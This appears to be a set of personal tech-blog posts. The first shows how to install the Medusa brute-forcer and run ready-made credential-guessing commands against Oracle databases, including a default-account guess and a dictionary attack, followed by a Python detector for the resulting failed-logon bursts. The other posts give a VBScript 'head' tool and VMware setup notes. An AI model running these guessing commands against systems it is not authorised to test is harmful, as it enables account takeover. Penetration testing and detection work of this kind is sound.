Brute forcing Oracle with Medusa

While I think Hydra is a great tool, it always seems to be a little flaky to me and I totally agree with the foofus guys that I doubt Hydra is always doing its job. So about a year ago I was testing some Oracle dbs and needed a “working” bruteforcer and came across Medusa. Since using Medusa I have stopped using Hydra because it seems to handle many more protocols and services than Hydra ever actually supported.
The instructions are on the wiki but I thought I would list them out here too.
Download Medusa from foofus.net. Do the standard

./configure --prefix=/stickit/whereever ; make; make install

If running Gentoo you can install the Pentoo Overlay and emerge Medusa that way.
You will also need the following packages. Here are the ebuilds in Gentoo’s portage.

app-admin/eselect-oracle
dev-db/oracle-instantclient-basic
dev-db/oracle-instantclient-sqlplus

Then to prep Medusa for Oracle support you need to get all your annoying environment variables set and install DBD::Oracle

export ORACLE_HOME=/usr/lib/oracle/10.2.0.3/client
export LD_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.3/client/include/
export LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
perl -MCPAN -e shell
install DBD::Oracle

DBD::Oracle installation failed for me so I did the following

cd ~/.cpan/build/DBD-Oracle-*
perl Makefile.PL
make install

As of version 1.5 the oracle.pl script needs to be adjusted
…/medusa-1.5/src/modsrc/wrapper/oracle.pl – modify line 50 to be:

my $msg = "", $err = 0;

Then to run Medusa using specific creds, like OUTLN/OUTLN try something like

./medusa -M wrapper -h 192.168.0.1 -u OUTLN -p OUTLN -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

To have it read in a list of users and a dictionary try something like

./medusa -M wrapper -h 192.168.0.1 -U /tmp/ora-users.txt -P /tmp/bigdict.txt -t 3 -r 1 -f -F -O /tmp/medusa-oracle-output -v 6 -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

I have noticed sometimes you need to throttle Medusa a little so the db can properly respond before you throw another attempt at it.
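On the database side, a run like the one above shows up as a burst of ORA-01017 logon failures from one client, sometimes ending in a successful logon. The following is an added example, not part of the original post or of Medusa, that flags that pattern in session audit records. It assumes failed logons are being audited; the sample rows are constructed and shaped like DBA_AUDIT_SESSION columns, and the threshold and window are assumptions to tune.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample rows: TIMESTAMP,USERHOST,USERNAME,RETURNCODE
# (column names follow DBA_AUDIT_SESSION; this is not real audit data).
# RETURNCODE 1017 = ORA-01017 invalid username/password, 0 = successful logon.
SAMPLE = """\
2010-01-12 10:00:01,scanbox,SYSTEM,1017
2010-01-12 10:00:02,scanbox,SYSTEM,1017
2010-01-12 10:00:03,scanbox,DBSNMP,1017
2010-01-12 10:00:04,appsrv,APPUSER,1017
2010-01-12 10:00:05,scanbox,DBSNMP,1017
2010-01-12 10:00:06,scanbox,OUTLN,1017
2010-01-12 10:00:08,scanbox,OUTLN,0
2010-01-12 10:05:00,appsrv,APPUSER,0
"""

def parse(text):
    """Turn CSV audit rows into (timestamp, host, user, returncode), oldest first."""
    rows = []
    for line in text.strip().splitlines():
        ts, host, user, rc = line.split(",")
        rows.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, user, int(rc)))
    return sorted(rows)

def detect(rows, threshold=5, window=timedelta(seconds=60)):
    """Flag hosts with >= threshold failed logons inside the window, and any
    successful logon that later comes from a flagged host.
    Alerts: ("guessing", host, distinct_accounts_tried)
            ("success_after_guessing", host, username)"""
    recent = defaultdict(deque)  # host -> (timestamp, user) of recent failures
    flagged = set()              # hosts stay flagged for the rest of the run
    alerts = []
    for ts, host, user, rc in rows:
        failures = recent[host]
        while failures and ts - failures[0][0] > window:
            failures.popleft()   # drop failures that fell out of the window
        if rc == 1017:
            failures.append((ts, user))
            if len(failures) >= threshold and host not in flagged:
                flagged.add(host)
                alerts.append(("guessing", host, len({u for _, u in failures})))
        elif rc == 0 and host in flagged:
            alerts.append(("success_after_guessing", host, user))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE)):
        print(alert)
```

A success-after-guessing alert is the one to act on first, since it means a credential pair from the guessing run was accepted.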


Head Command for Windows

I was looking for a way to do a head in Windows and didn’t want to use any third-party software and of course, it had to be on the commandline.  So like head I needed it to show X number of lines from the beginning.  I don’t know VBScript, so I am sure there is a better/cleaner way to write this but here is what I came up with.  If anyone knows an easier way please pass it on.

' head.vbs: print the first NumberOfLines lines of a text file
If WScript.Arguments.Count = 2 Then
    FileName = WScript.Arguments.Item(0)
    ' Convert the count from a string to a number
    NumLines = CLng(WScript.Arguments.Item(1))
Else
    WScript.Echo "Usage: cscript.exe head.vbs filename NumberOfLines"
    WScript.Quit
End If

Const ForReading = 1

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(FileName, ForReading)

Dim i
For i = 1 To NumLines
    ' Stop at end of file so a short file does not raise "Input past end of file"
    If objFile.AtEndOfStream Then Exit For
    WScript.Echo objFile.ReadLine
Next

objFile.Close

C:\dumps>type test.txt
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
line 9
line 10
line 11

C:\dumps>cscript //nologo head.vbs test.txt 8
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8

VMware Workstation 7 and Gentoo

As of writing this there isn’t an ebuild out for Workstation 7.  There is also a compile issue with Workstation 6.x and 7’s vmnet module using a 2.6.32 kernel.  I upgraded to 7 yesterday and unfortunately dropped VirtualBox.  Don’t get me wrong, I love VBox and have never had any problems with it performance-wise or feature-wise but I use VMware Workstation or Fusion on all my other systems and at work.  I continually found the need to transport vms around and things just didn’t work right when running and saving VMware vms in VBox and then running it back in VMware.

To install Workstation 7 I installed the following apps

dev-cpp/cairomm
dev-cpp/libgnomecanvasmm
dev-cpp/libsexymm
sys-apps/pciutils
sys-fs/fuse
sys-libs/glibc
x11-libs/libview
x11-libs/libgksu
x11-libs/libXcursor
x11-libs/libXft
x11-libs/libXi
x11-libs/libXinerama
x11-libs/libXrandr
dev-util/eclipse-sdk
gnome-base/gnome-desktop
gnome-base/gvfs

If you want to extract the bundle the following command will do it

./VMware-Workstation-Full-7.0.0-203739.x86_64.bundle -x /tmp/vmware-installer

The following creates the needed dirs for vmware

cd /etc
ln -s init.d rc0.d
ln -s init.d rc1.d
ln -s init.d rc2.d
ln -s init.d rc3.d
ln -s init.d rc4.d
ln -s init.d rc5.d
ln -s init.d rc6.d
ln -s init.d rcS.d

Copy the vmware bundle file to /usr/src.  For some reason telling it to install somewhere else seemed to fail for me.

./VMware-Workstation-Full-7.0.0-203739.x86_64.bundle --console --custom -I

Enter the defaults for pretty much everything, except tell it the init scripts are located in /etc/init.d, and then everything loads.

http://communities.vmware.com/thread/239221 – has information on patching vmware for the 2.6.32 kernel.  Haven’t tried it yet but seems simple enough.
